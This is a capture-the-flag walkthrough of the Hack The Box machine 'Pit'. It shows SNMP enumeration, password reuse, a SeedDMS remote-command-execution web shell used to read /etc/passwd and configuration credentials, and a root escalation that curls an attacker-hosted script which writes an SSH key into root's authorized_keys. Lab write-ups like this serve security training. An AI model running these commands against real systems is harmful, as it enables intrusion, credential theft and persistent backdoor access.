Enumeration
Scan open ports with RustScan:
rustscan -a 10.10.10.241 -- -sCV
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-34.png?w=1004)
Port 9090 is open, so we access: https://10.10.10.241:9090/
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-48.png?w=1024)
But we cannot login.
There is a host in the nmap output:
dms-pit.htb
Add the host to /etc/hosts
10.10.10.241 dms-pit.htb
But this web is forbidden.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-38.png?w=328)
Use UDP scan:
sudo nmap -sCVU 10.10.10.241
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-35.png?w=616)
Port 161 is open with Simple Network Management Protocol (snmp) service.
We will use snmp tool for this machine.
./snmpbw.pl 10.10.10.241 public 2 1
cat 10.10.10.241.snmp
We found directories:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-36.png?w=631)
and usernames:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-40.png?w=642)
Access the directory we found:
http://dms-pit.htb/seeddms51x/seeddms
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-39.png?w=1024)
We can login using the username we found, the password is the same.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-41.png?w=1024)
Search for SeedDMS in Exploit Database, we have SeedDMS versions < 5.1.11 – Remote Command Execution.
Go to our Docs -> Users -> Michelle:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-42.png?w=1024)
Add document, we will upload ‘1.php
‘ to the server.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-44.png?w=1024)
Then, go to the file (change the document id):
http://dms-pit.htb/seeddms51x/data/1048576/32/1.php?cmd=cat+/etc/passwd
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-45.png?w=722)
And the command executed.
Do a little enumerating, we found:
http://dms-pit.htb/seeddms51x/data/1048576/33/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml
View page source for a better view:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-46.png?w=1024)
Foothold
Use the password with the username we found before, we can login to: https://pit.htb:9090/
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-47.png?w=1024)
Go to Terminal, we can get the flag:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-51.png?w=1024)
Privilege Escalation
When using snmp tool, we found:
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-52.png?w=922)
cat /usr/bin/monitor
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-53.png?w=406)
We will create check.sh
for /usr/bin/monitor
to execute.
In our machine, run:
ssh-keygen
Create check.sh
#!/bin/bash
echo 'your-public-key' > /root/.ssh/authorized_keys
Host a http server:
python3 -m http.server 8080
In the michelle
‘s terminal, we run:
curl http://10.10.16.4:8080/check.sh -o /usr/local/monitoring/check.sh
After uploading the file, in our machine, run:
sudo apt-get install snmp-mibs-downloader
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
And check.sh
is executed, connect to ssh
:
ssh -i id_rsa root@10.10.10.241
![](https://niekdang.wordpress.com/wp-content/uploads/2021/07/image-54.png?w=352)